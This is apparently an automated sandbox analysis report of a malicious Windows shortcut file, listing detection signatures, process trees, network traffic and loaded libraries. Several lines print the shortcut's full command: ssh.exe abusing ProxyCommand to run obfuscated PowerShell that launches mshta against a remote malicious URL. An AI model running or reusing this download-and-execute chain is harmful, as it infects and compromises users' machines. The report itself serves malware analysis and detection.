
Windows Analysis Report
HngJMpDqxP.lnk

Overview

General Information

Sample name: HngJMpDqxP.lnk (renamed because original name is a hash value)
Original sample name: c90cd850078a3688894afc507e6b9ce8.lnk
Analysis ID: 1582823
MD5: c90cd850078a3688894afc507e6b9ce8
SHA1: 7f9a31f6fef0350c319380e367e7f612f3ecce14
SHA256: 70f3b05eb07d9af8dddbd9b5a0aa2e27bf4feda3bef1d4c1b50aaa4c722a1050
Tags: lnk, user-abuse_ch

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Sigma detected: Potentially Suspicious PowerShell Child Processes
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Lolbin Ssh.exe Use As Proxy
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • ssh.exe (PID: 6408 cmdline: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40)" . MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
    • conhost.exe (PID: 2632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4856 cmdline: powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 6788 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://klipzynigou.shop/An4me.mp4" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 6096 cmdline: "C:\Windows\system32\mshta.exe" https://klipzynigou.shop/An4me.mp4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • svchost.exe (PID: 2544 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\system32\mshta.exe" https://klipzynigou.shop/An4me.mp4, CommandLine: "C:\Windows\system32\mshta.exe" https://klipzynigou.shop/An4me.mp4, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://klipzynigou.shop/An4me.mp4", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6788, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://klipzynigou.shop/An4me.mp4, ProcessId: 6096, ProcessName: mshta.exe
Source: Process started; Author: frack113, Nasreddine Bencherchali; Data: Command: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40)" ., CommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40)" ., CommandLine|base64offset|contains: , Image: C:\Windows\System32\OpenSSH\ssh.exe, NewProcessName: C:\Windows\System32\OpenSSH\ssh.exe, OriginalFileName: C:\Windows\System32\OpenSSH\ssh.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40)" ., ProcessId: 6408, ProcessName: ssh.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40), CommandLine: powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40)" ., ParentImage: C:\Windows\System32\OpenSSH\ssh.exe, ParentProcessId: 6408, ParentProcessName: ssh.exe, ProcessCommandLine: powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40), ProcessId: 4856, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2544, ProcessName: svchost.exe
No Suricata rule has matched

AV Detection

Source: https://klipzynigou.shop/An4me.mp4; Avira URL Cloud: Label: malware
Source: HngJMpDqxP.lnk; Virustotal: Detection: 32%
Source: HngJMpDqxP.lnk; ReversingLabs: Detection: 31%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 98.2% probability
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: Joe Sandbox View; IP Address: 188.114.97.3
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic; HTTP traffic detected: GET /An4me.mp4 HTTP/1.1 | Accept: */* | Accept-Language: en-CH | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: klipzynigou.shop | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /cdn-cgi/styles/cf.errors.css HTTP/1.1 | Accept: */* | Referer: https://klipzynigou.shop/An4me.mp4 | Accept-Language: en-CH | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: klipzynigou.shop | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1 | Accept: */* | Referer: https://klipzynigou.shop/An4me.mp4 | Accept-Language: en-CH | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: klipzynigou.shop | Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: klipzynigou.shop
Source: global traffic; HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Tue, 31 Dec 2024 14:41:48 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | X-Frame-Options: SAMEORIGIN | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5om3NfZWMUo%2BVpO29cMNIZFag%2B6iIRnXolkfymaae691alAt%2B9mWIQarL1KBn8M2IBal4P9UJsTM%2FI7cwFXriFQghoqgH0YYkJRMP%2F97OaUt%2Bp%2Bnl%2B5IAcqQYtS00HC0ymAM"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8fab0858a929437e-EWR
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown; Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown; Network traffic detected: HTTP traffic on port 49718 -> 443

System Summary

Source: HngJMpDqxP.lnk; LNK file: -o ProxyCommand="powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40)" .
Source: C:\Windows\System32\svchost.exe; File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 4_2_00007FFD33DD2795
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 4_2_00007FFD33DD20ED
Source: C:\Windows\System32\mshta.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: classification engine; Classification label: mal76.winLNK@9/11@1/2
Source: C:\Windows\System32\OpenSSH\ssh.exe; File created: C:\Users\user\.ssh
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5odwgj3q.p55.ps1
Source: C:\Windows\System32\conhost.exe; File read: C:\Users\desktop.ini
Source: C:\Windows\System32\OpenSSH\ssh.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: HngJMpDqxP.lnk; Virustotal: Detection: 32%
Source: HngJMpDqxP.lnk; ReversingLabs: Detection: 31%
Source: unknown; Process created: C:\Windows\System32\OpenSSH\ssh.exe "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40)" .
Source: C:\Windows\System32\OpenSSH\ssh.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\OpenSSH\ssh.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://klipzynigou.shop/An4me.mp4"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://klipzynigou.shop/An4me.mp4
Source: unknown; Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\OpenSSH\ssh.exe; Section loaded: libcrypto.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe; Section loaded: sspicli.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe; Section loaded: cryptsp.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe; Section loaded: rsaenh.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe; Section loaded: cryptbase.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe; Section loaded: napinsp.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe; Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe; Section loaded: wshbth.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe; Section loaded: nlaapi.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe; Section loaded: iphlpapi.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe; Section loaded: mswsock.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe; Section loaded: dnsapi.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe; Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: wininet.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: mswsock.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: iphlpapi.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: winnsi.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: ieframe.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: netapi32.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: dnsapi.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: rasadhlp.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uianimation.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: HngJMpDqxP.lnkLNK file: ..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Persistence and Installation Behavior

Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
